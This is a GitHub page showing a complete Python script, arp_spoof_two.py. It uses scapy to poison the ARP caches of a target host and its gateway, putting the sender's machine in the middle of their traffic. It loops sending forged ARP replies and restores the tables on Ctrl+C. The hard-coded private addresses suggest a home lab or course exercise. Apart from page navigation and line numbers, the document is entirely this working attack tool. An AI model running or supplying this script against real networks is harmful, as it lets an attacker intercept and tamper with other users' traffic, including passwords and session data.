-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy patharp_spoof_two.py
More file actions
66 lines (52 loc) · 1.72 KB
/
arp_spoof_two.py
File metadata and controls
66 lines (52 loc) · 1.72 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
#!/usr/bin/env python
import scapy.all as scapy
import time
def get_mac(ip):
arp_request = scapy.ARP(pdst=ip)
broadcast = scapy.Ether(dst="ff:ff:ff:ff:ff:ff")
arp_request_broadcast = broadcast / arp_request
answered_list = scapy.srp(arp_request_broadcast, timeout=1, verbose=False)[0]
if len(answered_list) == 0:
print(f"[!] No response for IP: {ip}")
return None
return answered_list[0][1].hwsrc
def spoof(target_ip, spoof_ip):
target_mac = get_mac(target_ip)
if not target_mac:
print(f"[!] Could not find MAC for {target_ip}")
return
packet = scapy.Ether(dst=target_mac) / scapy.ARP(
op=2,
pdst=target_ip,
hwdst=target_mac,
psrc=spoof_ip
)
scapy.sendp(packet, verbose=False)
def restore(destination_ip, source_ip):
destination_mac = get_mac(destination_ip)
source_mac = get_mac(source_ip)
if not (destination_mac and source_mac):
print("[!] Could not restore ARP table (missing MAC).")
return
packet = scapy.Ether(dst=destination_mac) / scapy.ARP(
op=2,
pdst=destination_ip,
hwdst=destination_mac,
psrc=source_ip,
hwsrc=source_mac
)
scapy.sendp(packet, count=4, verbose=False)
target_ip = "192.168.79.130"
gateway_ip = "192.168.79.2"
try:
sent_packets_count = 0
while True:
spoof(target_ip, gateway_ip)
spoof(gateway_ip, target_ip)
sent_packets_count += 2
print("\r[+] Packets sent:", sent_packets_count, end="")
time.sleep(2)
except KeyboardInterrupt:
print("\n[+] Detected CTRL+C ..... Resetting ARP tables..... Please Wait.\n")
restore(target_ip, gateway_ip)
restore(gateway_ip, target_ip)